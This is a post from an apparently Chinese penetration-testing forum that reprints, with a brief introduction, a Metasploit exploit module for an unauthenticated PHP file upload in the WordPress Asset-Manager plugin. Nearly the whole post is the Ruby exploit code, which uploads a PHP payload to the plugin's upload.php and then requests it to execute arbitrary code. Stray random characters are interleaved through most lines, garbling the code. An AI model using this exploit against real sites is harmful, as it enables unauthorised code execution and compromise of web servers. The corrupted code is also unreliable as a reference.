找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 WordPress Asset-Manager PHP文件上传漏洞
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 1993|回复: 0
打印 上一主题 下一主题

WordPress Asset-Manager PHP文件上传漏洞

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-12-31 09:22:33 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
这个模块利用Metasploi脆弱漏洞库在WordPress版本Asset-Manager插件2.0以及以下版本发现的。允许上传php文件、一用户可以上传一个文件到一个临时目录没有身份验证,从而导致执行任意代码。4 C) Q- C* o$ I+ q

3 x/ _8 i3 Q8 w9 ?9 d0 H2 O$ F4 A##; Q% z% M6 ~5 \2 L
# This file is part of the Metasploit Framework and may be subject to
# u) f- n$ y  b" w" B2 T- W# redistribution and commercial restrictions. Please see the Metasploit" F( L/ X2 y/ [) S& X% F, H
# Framework web site for more information on licensing and terms of use.
7 D/ Z( r. ]7 {( U#   http://metasploit.com/framework/
9 G* H" X4 s( o1 r% a##
) z& G6 U5 c! } 2 }: P, q0 R. C' n1 p
require 'msf/core'& _3 V6 z) z3 i4 a
require 'msf/core/exploit/php_exe'8 D7 A+ o# @" r, L6 g
4 k" S, A8 w. y7 k, `5 S
class Metasploit3 < Msf::Exploit::Remote
3 A7 j1 H8 P7 M/ r, ]" U6 n( R" s+ t  Rank = ExcellentRanking# y/ p9 Q7 ^: [  F- F  l8 @
1 a% l7 j+ @' y1 l! `3 {% g
  include Msf::Exploit::Remote::HttpClient
8 d, D) b% p& i- X  include Msf::Exploit:hpEXE
" G5 u' ^& u4 j& I9 l 6 T" @2 I& d; {' u% A. [5 J; o. G8 G
  def initialize(info = {})3 ~) D7 b$ U6 y) P0 S
    super(update_info(info,
& I! y- Q! ?, U/ Q! X      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',) [! K6 b) N  Z7 J2 t: g0 v9 Z; b6 I
      'Description'    => %q{6 @; f. ?: l3 J' ]/ Y3 T, z5 x
        This module exploits a vulnerability found in Asset-Manager <= 2.0  WordPress
4 {% {- ]5 ]3 m        plugin.  By abusing the upload.php file, a malicious user can upload a file to a
6 h9 e: D) ~1 G9 A        temp directory without authentication, which results in arbitrary code execution.' R9 a" k& F* P- T0 v: X! T, y
      },
# [# y& L; |/ C4 N/ E  e. d  v8 ^      'Author'         =>* H! A% m# T) \$ w8 T
        [
- @& ]$ `; q; p  I          'Sammy FORGIT', # initial discovery% t0 d: ~7 J2 [3 L2 H7 m1 S
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
' g5 q! m) u1 U# K; D        ],
* O5 z; B  z; V$ @6 H; V      'License'        => MSF_LICENSE,8 T9 W- a5 F7 Z
      'References'     =>) q* ]" V" }* _! l/ A. z
        [
9 ?. R4 N: c9 l$ R1 [8 S6 A          [ 'OSVDB', '82653' ],
/ m- H, c/ Q' G, {6 n          [ 'BID', '53809' ],
6 ~6 O0 z4 Z# w2 t* b6 Z& B/ i$ d          [ 'EDB', '18993' ],
2 c) a% x& J9 C' @0 r7 C          [ 'URL', 'http:// www.myhack58.com /' ]
% {- ?9 t3 t& M. w! H  u  T' I: r        ],
) `  t9 [2 s: t* ~( z      'Payload'       =>
& v  V! `( v4 C4 V+ p5 u        {
6 K! M' K! W$ N; N$ x          'BadChars' => "\x00",! V$ j! U2 c  I* t  y
        },
8 Z9 Z5 R+ m9 |2 M- c      'Platform'       => 'php',0 d9 ]) u; A0 A% T
      'Arch'           => ARCH_PHP,4 c2 u) p& S) X( z5 O7 A
      'Targets'        =>
! u% Q$ }9 |, m% D, o1 M0 n        [5 r7 D' x1 ?; L; Y- h+ X2 [& ?
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],, _& e, w: \/ d* l* \' ~/ d' O/ B3 D
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]- e% e$ I7 T  u: H+ k) G
        ],* f  w$ X+ p. d* B: s% `7 ~: A/ u8 W
      'DefaultTarget' => 0,. I8 ^# E% B: i- e
      'DisclosureDate' => 'May 26 2012'))
5 w9 G( h" s; | ! }* u. g6 ?$ H, H% h8 d
    register_options(
8 N( o  n0 e+ k8 x# w! l      [1 G$ n7 M. h3 \; o" Z: N
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
9 ?* o2 f4 r- j' j" S; D* Q      ], self.class)
) x" Y2 _0 Y7 G3 o: G  end
" w( _( w- Q* ]; _ - [3 z# {' p  \- _
  def exploit
, n" X2 j; a& g7 x    uri =  target_uri.path' {; Z, H7 K$ z; y8 g- o
    uri << '/' if uri[-1,1] != '/'
! h* z& o* K% y+ o* N7 T    peer = "#{rhost}:#{rport}"7 R/ U+ R" S( j5 @, s$ O! f4 f% N
    payload_name = "#{rand_text_alpha(5)}.php"
) Z/ J6 E/ i1 j, ?. ]" F/ T& w    php_payload = get_write_exec_payload(:unlink_self=>true)
" {7 G  g4 S- ~) C; l3 J( [ & \- N  Z0 }: n6 {6 X
    data = Rex::MIME::Message.new8 K$ Q- p# s, A# ?  J. {
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
1 C- d/ T, A# d" l    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')$ v% M  K, j% o0 _* R9 C: i

  H1 h4 L1 ]! K& \$ {$ A/ J9 M: f# e    print_status("#{peer} - Uploading payload #{payload_name}")* N) ]2 R7 `& v' s# R4 M1 r
    res = send_request_cgi({' G  y* E9 {4 n# u8 W' |
      'method'  => 'POST',- u- W7 J- R, ]8 Y* i, |- Z* O( _
      'uri'     => "#{uri}wp-content/plugins/asset-manager/upload.php",2 i; h  g5 {$ f9 D
      'ctype'   => "multipart/form-data; boundary=#{data.bound}",9 b/ W1 N8 j! d" k$ t' d, V
      'data'    => post_data) i1 ~( g4 x% C' R1 h/ {
    })
% e" Q( r: |' E2 m+ g7 ~9 [$ _ . z* D" X/ B7 S
    if not res or res.code != 200 or res.body !~ /#{payload_name}// p  `0 L. _' z: m( Y
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")  ?2 I, Z( C3 R+ q, `% U, l
end
/ b; T1 L! M2 K & _' m- T7 i! g2 U
    print_status("#{peer} - Executing payload #{payload_name}")$ \, A7 H; m( v6 I
    res = send_request_raw({
& v3 C. i- g. o. V) E* T      'uri'     => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",2 `6 Q8 w1 W" u
      'method'  => 'GET'- P# e5 N0 ?0 K9 \3 a, z* D
    })
: J$ E7 J( q4 m1 e0 j' r
/ g! V/ E; D& Q: w  `    if res and res.code != 200% C" [4 `) c; M. ?0 G$ |. X* b
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")) D5 z: }) m% d4 u/ F
    end
5 I4 x6 C: s. q$ \  end  f, Z' p" G4 }0 B4 s* M* `. D
end) o4 R9 T. e  I
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表